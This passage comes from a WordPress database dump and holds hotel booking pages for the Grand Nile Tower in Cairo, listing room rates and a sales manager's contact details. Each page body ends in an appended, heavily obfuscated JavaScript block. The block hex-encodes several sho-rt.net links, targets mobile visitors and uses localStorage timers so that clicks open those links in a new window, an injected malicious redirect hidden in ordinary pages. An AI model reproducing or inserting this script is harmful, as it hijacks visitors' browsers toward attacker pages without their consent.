e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 00:27:57','2023-06-24 00:27:57','',2685,'https://gsw2023.com/?p=4777',0,'revision','',0),
(4778,1,'2023-06-24 00:50:36','2023-06-24 00:50:36','<!-- wp:paragraph -->\n<p>For Booking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>glad to offer $150 Single , $ 165 Double all inclusive of<br>service charge &amp; taxes based on bed &amp; breakfast<br>bases .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br><strong>For reservations please send to<br>Haythem.sherif@grandniletower.com</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Best regards,<br>Haythem Sherif<br>Senior Sales Manager<br>haythem.sherif(@grandniletower.com<br>Grand Nile Tower<br>T: 202 23651234 F: 202 23686668 M: 01000066673<br>Corniche El Nil, Garden City, Cairo, Egypt</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Grand Nile Tower Hotel','','publish','closed','closed','','grand-nile-tower-hotel','','','2023-06-24 00:53:59','2023-06-24 00:53:59','',0,'https://gsw2023.com/?page_id=4778',0,'page','',0),
(4780,1,'2023-06-24 00:50:36','2023-06-24 00:50:36','<!-- wp:paragraph -->\n<p>For Booking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>glad to offer $150 Single , $ 165 Double all inclusive of<br>service charge &amp; taxes based on bed &amp; breakfast<br>bases .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br><strong>For reservations please send to<br>Haythem.sherif@grandniletower.com</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 